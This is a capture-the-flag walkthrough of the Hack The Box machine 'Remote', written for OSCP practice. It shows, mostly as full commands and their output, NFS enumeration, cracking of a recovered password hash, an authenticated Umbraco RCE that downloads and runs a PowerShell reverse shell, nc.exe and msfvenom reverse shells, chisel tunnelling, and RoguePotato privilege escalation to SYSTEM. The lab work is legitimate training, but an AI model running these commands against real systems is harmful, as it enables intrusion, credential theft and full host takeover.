In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Enumeration
Nmap scan
# Nmap 7.94 scan initiated Thu Oct 26 00:06:21 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/remote/results/10.10.10.180/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/remote/results/10.10.10.180/scans/xml/_quick_tcp_nmap.xml 10.10.10.180
Nmap scan report for 10.10.10.180
Host is up, received user-set (0.31s latency).
Scanned at 2023-10-26 00:06:22 EDT for 386s
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
2049/tcp open nlockmgr syn-ack 1-4 (RPC #100021)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-10-26T04:09:44
|_ start_date: N/A
|_clock-skew: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 45222/tcp): CLEAN (Couldn't connect)
| Check 2 (port 38622/tcp): CLEAN (Couldn't connect)
| Check 3 (port 15893/udp): CLEAN (Failed to receive data)
| Check 4 (port 51124/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Oct 26 00:12:48 2023 -- 1 IP address (1 host up) scanned in 387.28 seconds
Port 111
Export list for 10.10.10.180:
/site_backups (everyone)
nikto
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.10.180
+ Target Hostname: 10.10.10.180
+ Target Port: 80
+ Start Time: 2023-10-26 00:12:54 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /home/: This might be interesting.
+ /intranet/: This might be interesting.
+ /umbraco/ping.aspx: Umbraco ping page found.
+ 7673 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2023-10-26 00:55:44 (GMT-4) (2570 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
from one of the enumeration, from port 111
PORT STATE SERVICE REASON VERSION
111/tcp open rpcbind? syn-ack
| rpcinfo:
| program version port/proto service
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100021 3,4 2049/tcp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Oct 26 00:17:07 2023 -- 1 IP address (1 host up) scanned in 258.42 seconds
Export list for 10.10.10.180:
/site_backups (everyone)
We mount this
╭─kali@kali ~/HTB/remote
╰─$ sudo mount -v -t nfs 10.10.10.180:/site_backups /mnt/
mount.nfs: timeout set for Thu Oct 26 22:22:09 2023
mount.nfs: trying text-based options 'vers=4.2,addr=10.10.10.180,clientaddr=10.10.14.4'
mount.nfs: mount(2): Protocol not supported
mount.nfs: trying text-based options 'vers=4,minorversion=1,addr=10.10.10.180,clientaddr=10.10.14.4'
╭─kali@kali ~/HTB/remote
╰─$ cd mnt
╭─kali@kali ~/HTB/remote/mnt
╰─$ ls
App_Browsers App_Plugins bin css Global.asax scripts Umbraco_Client Web.config
App_Data aspnet_client Config default.aspx Media Umbraco Views
╭─kali@kali ~/HTB/remote/mnt
╰─$
did a search on the .sdf file and found some hashes
╭─kali@kali ~/HTB/remote/mnt/App_Data
╰─$ strings umbraco.sdf |grep -i password
userPassword
Password
Password
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/password/changepassword change
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/password/changepassword change
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.137User "ssmith" <[email protected]>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "SYSTEM" 192.168.195.1User "ssmith" <[email protected]>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "ssmith" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "ssmith" <[email protected]>umbraco/user/password/changepassword change
User "SYSTEM" 192.168.195.1User "ssmith" <[email protected]>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/password/changepassword change
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/password/changepassword change
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
passwordConfig
lastPasswordChangeDate
umbracoMemberFailedPasswordAttemptsFailed Password Attempts
umbracoMemberLastPasswordChangeDateLast Password Change Date
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
umbracoMemberPasswordRetrievalAnswerPassword Answer
umbracoMemberPasswordRetrievalQuestionPassword Question
╭─kali@kali ~/HTB/remote/mnt/App_Data
╰─$ strings umbraco.sdf |grep -i [email protected] | grep -i password
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/password/changepassword change
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/password/changepassword change
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "ssmith" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "ssmith" <[email protected]>umbraco/user/password/changepassword change
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/password/changepassword change
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/password/changepassword change
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
more refined search we see some hashes
╭─kali@kali ~/HTB/remote/mnt/App_Data
╰─$ strings umbraco.sdf |grep -i [email protected] | grep -i hash
[email protected]{"hashAlgorithm":"SHA1"}[email protected]
[email protected]{"hashAlgorithm":"SHA1"}[email protected]
╭─kali@kali ~/HTB/remote/mnt/App_Data
Copy the b8be16afba8c314ad33d812f22a04991b90e2aaa to a hash.txt file
╭─kali@kali ~/HTB/remote
╰─$ cat hash.txt
b8be16afba8c314ad33d812f22a04991b90e2aaa
╭─kali@kali ~/HTB/remote
╰─$
Cracking with hashcat
╭─kali@kali /usr/bin
╰─$ ./hashcat -m 100 ~/HTB/remote/hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i7-1160G7 @ 1.20GHz, 2815/5694 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 100 (SHA1)
Hash.Target......: b8be16afba8c314ad33d812f22a04991b90e2aaa
Time.Started.....: Thu Oct 26 22:38:14 2023 (8 secs)
Time.Estimated...: Thu Oct 26 22:38:22 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1325.3 kH/s (0.35ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 9824256/14344385 (68.49%)
Rejected.........: 0/9824256 (0.00%)
Restore.Point....: 9822208/14344385 (68.47%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: badboi56 -> bacninh_kc
Hardware.Mon.#1..: Util: 43%
Started: Thu Oct 26 22:38:11 2023
Stopped: Thu Oct 26 22:38:24 2023
╭─kali@kali /usr/bin
we have username admin and password baconandcheese
we log in via the website
via help, we find that the site is Umbraco version 7.12.4
Checking searchsploit
╭─kali@kali ~/HTB/remote
╰─$ searchsploit umbraco
-------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------- ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit) | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) | aspx/webapps/49488.py
Umbraco CMS 8.9.1 - Directory Traversal | aspx/webapps/50241.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting | php/webapps/44988.txt
Umbraco v8.14.1 - 'baseUrl' SSRF | aspx/webapps/50462.txt
-------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
╭─kali@kali ~/HTB/remote
╰─$
Got a script for umbraco here –>https://github.com/noraj/Umbraco-RCE
Downloaded and run the script but first modified Invoke-PowerShellTcp.ps1 and add the line at the end
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.4 -Port 443
run the exploit and listen in on 443 while serving Invoke-PowerShellTcp.ps1
serving
╰─$ serve 9000
Starting HTTP server on port 9000...
====================================
certutil -urlcache -f http://10.10.14.4:9000/file_to_download.txt C:\path\where\you\lile.txt
Invoke-WebRequest -Uri http://10.10.14.4:9000/file_to_download.txt -OutFile C:\path\lile.txt
exploit
╭─kali@kali ~/HTB/remote
╰─$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180/' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4:9000/Invoke-PowerShellTcp.ps1')"
Listener
╭─kali@kali ~/HTB/remote
╰─$ nc -nlvp 443 1 ↵
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.180] 49689
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>
I want to get back to cmd so i will run a reverse shell to 4444 with ncat which i copy to the machine
PS C:\> cd temp
PS C:\temp> powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.4:9000/nc.exe', 'c:\temp\nc.exe')"
Directory: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/27/2023 8:48 PM 59392 nc.exe
PS C:\temp> c:\temp\nc.exe 10.10.14.4 4444 -e cmd.exe
listener
╰─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.180] 49691
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\temp>
whoami
:\temp>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
ERROR: Unable to get user claims information.
we have SeImpersonatePrivileg so we are going to try Rogue Potato
copy to machine
l % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 155k 100 155k 0 0 79616 0 0:00:02 0:00:02 --:--:-- 77787
C:\temp>
from online
Rougue Potato
.\RoguePotato.exe -r 10.10.x.x -l 9999 -e c:\\Windows\\Temp\\rev.bat
Creating reverse shell to 444
╰─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.4 -a x64 --platform windows LPORT=444 -f exe > potato.exe
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
╭─kali@kali ~/HTB/remote
╰─$
copy to machine
C:\temp>curl http://10.10.14.4:9000/Potato.exe -o Potato.exe
curl http://10.10.14.4:9000/Potato.exe -o Potato.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 335 100 335 0 0 335 0 0:00:01 --:--:-- 0:00:01 476
copy chisel to windows
C:\temp>curl http://10.10.14.4:9000/chisel_1.9.1_windows_amd64 -o chisel_1.9.1_windows_amd64
curl http://10.10.14.4:9000/chisel_1.9.1_windows_amd64 -o chisel_1.9.1_windows_amd64
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 8795k 100 8795k 0 0 676k 0 0:00:13 0:00:13 --:--:-- 1454k
C:\temp>
start chisel on linux
╭─kali@kali ~/HTB/remote
╰─$ sudo ./chisel_1.9.1_linux_amd64 server -p 8000 --reverse 130 ↵
[sudo] password for kali:
2023/10/28 06:51:52 server: Reverse tunnelling enabled
2023/10/28 06:51:52 server: Fingerprint kh/0fS9NoP6LVW1Yp8dVD9m9Kl0jDFSDRIw8SxzB1b0=
2023/10/28 06:51:52 server: Listening on http://0.0.0.0:8000
run chisel on client
chisel_1.9.1_windows_amd64 client 10.10.14.4:8000 R:135:localhost:9999
2023/10/28 07:04:24 client: Connecting to ws://10.10.14.4:8000
2023/10/28 07:04:27 client: Connected (Latency 348.9001ms)
run Rogue potato and listen on por 444
RoguePotato test with ping
.\RoguePotato.exe -r 10.10.14.4 -e "cmd.exe /c ping 10.10.14.4" -l 9999
and tcdump
╰─$ sudo tcpdump -i tun0 icmp 1 ↵
[sudo] password for kali:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
07:16:31.610411 IP 10.10.10.180 > 10.10.14.4: ICMP echo request, id 1, seq 5, length 40
07:16:31.617186 IP 10.10.14.4 > 10.10.10.180: ICMP echo reply, id 1, seq 5, length 40
07:16:32.809065 IP 10.10.10.180 > 10.10.14.4: ICMP echo request, id 1, seq 6, length 40
07:16:32.809152 IP 10.10.14.4 > 10.10.10.180: ICMP echo reply, id 1, seq 6, length 40
07:16:33.720648 IP 10.10.10.180 > 10.10.14.4: ICMP echo request, id 1, seq 7, length 40
07:16:33.720691 IP 10.10.14.4 > 10.10.10.180: ICMP echo reply, id 1, seq 7, length 40
C:\temp>.\RoguePotato.exe -r 10.10.14.4 -e "cmd.exe /c nc.exe 10.10.14.4 444 -e cmd.exe" -l 9999
.\RoguePotato.exe -r 10.10.14.4 -e "cmd.exe /c nc.exe 10.10.14.4 444 -e cmd.exe" -l 9999
[+] Starting RoguePotato...
[*] Creating Rogue OXID resolver thread
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] Calling CoGetInstanceFromIStorage with CLSID:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written:102 bytes
[*] SecurityCallback RPC call
[*] ServerAlive2 RPC Call
[*] SecurityCallback RPC call
[*] ResolveOxid2 RPC call, this is for us!
[*] ResolveOxid2: returned endpoint binding information = ncacn_np:localhost/pipe/RoguePotato[\pipe\epmapper]
[*] Client connected!
[+] Got SYSTEM Token!!!
[*] Token has SE_ASSIGN_PRIMARY_NAME, using CreateProcessAsUser() for launching: cmd.exe /c nc.exe 10.10.14.4 444 -e cmd.exe
[+] RoguePotato gave you the SYSTEM powerz :D
C:\temp>whoami
whoami
nt authority\system
C:\temp>